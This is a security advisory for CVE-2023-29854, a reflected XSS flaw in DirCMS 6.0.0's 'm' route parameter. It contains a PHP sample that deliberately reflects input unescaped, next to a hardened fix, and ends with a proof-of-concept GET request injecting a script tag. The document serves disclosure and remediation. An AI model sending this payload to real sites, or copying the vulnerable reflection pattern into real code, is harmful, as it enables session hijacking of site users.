CVE-2023-29854: Vulnerabilitys/DirCMS_V6.0.0_XSS_vulnerability.md at main · secflag/Vulnerabilitys
DirCMS 6.0.0 has a Cross Site Scripting (XSS) vulnerability in the foreground.
DirCMS V6.0.0 has an XSS vulnerability in the foreground

Vulnerability description
DirCMS is a powerful yet compact content management system built on a PHP + MySQL architecture. All of its code is open source, which makes it easy for users to extend or customize, and it uses a simple template-tag technique that makes template creation easier. Under normal circumstances it takes only half a day to build an enterprise website with DirCMS, which delivers on its goal of being simple, practical, powerful and flexible. It can be widely used to build portals, download sites, enterprise sites, studio sites and other kinds of sites. From its release until the beginning of 2011, DirCMS accumulated tens of thousands of users and earned a good reputation.

There is an XSS vulnerability in the foreground of DirCMS V6.0.0.

Program download address: https://gitee.com/greenlaw/dircms6

Vulnerability URL: /dircms/Core/Config/Routes.php. Parameter filtering is not strict, so an XSS vulnerability exists.
Vulnerability analysis
In line 74 of the file /dircms/Core/Config/Routes.php, the parameter submitted by the client is received and saved in the variable m.
It is then passed to the setDefaultMethod function in the file /dircms/System/Router/RouteCollection.php for processing.
In this method the user-supplied data is not filtered and is output as received, so an XSS vulnerability exists.
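The pattern described above (a method name taken from the m query parameter and reflected into the response unfiltered) and the fix a maintainer would apply, as an added illustration; this is not DirCMS's actual Routes.php or RouteCollection.php code. It assumes a function that reflects the method name into HTML, and the function names render_method_vulnerable, render_method_hardened and is_valid_method_name are hypothetical.

```php
<?php
// Added illustration, not DirCMS's own code. Assumed: a controller method
// name arrives in the query parameter "m" and is later written into an HTML
// response, which is the flow the advisory describes.

// Vulnerable pattern: the raw value is reflected into HTML without filtering,
// so a value containing markup is rendered as markup.
function render_method_vulnerable(string $m): string
{
    return "<p>Method: " . $m . "</p>";
}

// Hardened pattern, two independent layers:
// 1. Validate: a route/controller method name is an identifier, so anything
//    that is not one is rejected before it reaches the router
//    (the setDefaultMethod step in the analysis above).
// 2. Escape: anything reflected into HTML goes through htmlspecialchars with
//    ENT_QUOTES so <, >, ", ' and & cannot break out of the surrounding markup.
function is_valid_method_name(string $m): bool
{
    return (bool) preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}$/', $m);
}

function render_method_hardened(?string $m): string
{
    if ($m === null || !is_valid_method_name($m)) {
        http_response_code(400);
        return '<p>Invalid method name.</p>';
    }
    $safe = htmlspecialchars($m, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<p>Method: " . $safe . "</p>";
}

// Constructed sample inputs: the m value from the advisory's PoC request and
// a normal method name.
$samples = [
    'show_indexqdspk<script>alert(1)</script>dx3bt',
    'show_index',
];
foreach ($samples as $m) {
    // First sample: the script tag survives in the vulnerable output and is
    // rejected by the hardened one. Second sample: both render "show_index".
    echo render_method_vulnerable($m), "\n";
    echo render_method_hardened($m), "\n";
}
```

Validation alone is the right fix for this parameter, since a method name never legitimately contains markup; the escaping layer is kept so that any other reflection of the same value (error pages, logs rendered in the admin UI) stays safe even if validation is bypassed elsewhere.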
Vulnerability verification
GET /admin.php?c=module_search&dir=22222&m=show_indexqdspk<script>alert(1)</script>dx3bt HTTP/1.1
Host: 10.10.10.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh
Referer: http://10.10.10.1/admin.php?c=home&m=home
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Connection: close